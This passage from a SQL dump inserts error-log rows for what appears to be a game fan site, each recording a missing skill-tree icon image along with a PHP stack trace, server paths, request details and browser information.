`message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (469, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_power.png\' found.', '8b777a218bf0b8aa7263c3d80a7af94ed054d619', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_powe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_powe...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_power.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 97, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (471, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_searinglight.png\' found.', '04fea401f742725315911aac243b3849f6896f60', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_sear...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_sear...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_searinglight.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 89, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (472, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_devotionaura.png\' found.', '63a0db646d0f678fbebab558df59f02e1b919276', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_devo...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_devo...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_devotionaura.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 88, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (473, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealofprotection.png\' found.', 'cdb466f40fc5e37459f6e4bce57633d4e281ae10', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_sealofprotection.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 82, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (474, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealoffury.png\' found.', 'daf6dc45b3fe6428ce92b26595d24c4e06bab0cb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_sealoffury.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 76, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (475, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_magic_lesserinvisibility.png\' found.', '5f3662a70afa59babc09e65ecbbef10fc4dc459c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_magic_les...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_magic_les...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 22:18:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_magic_lesserinvisibility.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (476, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_magic_lesserinvisibilty.png\' found.', 'cff2b1e9dc0619dbe578bc5a68a03afbc0158fc3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_magic_les...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_magic_les...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_magic_lesserinvisibilty.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 150, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (477, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealofmight.png\' found.', '3e5c1ff184e24abb5fbb98ffe515434b90873025', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_sealofmight.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 127, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (478, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_mindsooth.png\' found.', '21a1e04e3b5e958a9fc134db190ed7f7c95c8bd7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_mind...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_mind...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_mindsooth.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 66, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (479, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_lightningshield.png\' found.', 'ab5cc5526b97a864fb1960b2333e3506ab797bf3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_li...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_li...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_lightningshield.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 151, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (480, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_blessingofstrength.png\' found.', '78020888b90fc5a6881aac22ded9da5347e22580', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_bles...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_bles...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_blessingofstrength.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 142, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (481, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_blessingofprotection.png\' found.', '2ce3496a73b3b3febcf25d037a46859d1e70406a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_bles...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_bles...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_blessingofprotection.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 58, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (482, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_fistofjustice.png\' found.', '0b3ac9da2cb5d7122824a35215bfaccc71cd066b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_fist...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_fist...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_fistofjustice.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 56, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (483, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_righteousfury.png\' found.', 'f6c78527dcd4617b26d5d9e62ce7708042a631b2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_righ...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_righ...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_righteousfury.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 52, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (484, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_holysmite.png\' found.', 'a6429a65a270fda7f8a50e9184d8228a2725c46d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_holy...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_holy...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:47:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_holysmite.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 51, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (485, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_vindication.png\' found.', '5638dfb78be81c861277b08e139f8a01cb94817c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_vind...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_vind...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_vindication.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 46, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (486, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_retributionaura.png\' found.', 'c041f952c56b7480db661571e131ef7afcfd51c8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_retr...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_retr...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_retributionaura.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 44, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (487, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_wariior_innerrage.png\' found.', 'e60d6286b4a209faf07b8180d11440ecc3d981cc', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_wariior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_wariior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-13 22:27:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_wariior_innerrage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (488, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_persuutofjustice.png\' found.', '50db077bac0521baa539ad95d6958f02af03ec45', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_pers...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_pers...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-13 22:27:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_persuutofjustice.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (489, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_persuitofjustice.png\' found.', '519560f3bdd7ddd18e78c8b33b7f24fd42d2023d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_pers...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_pers...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.056, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_persuitofjustice.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 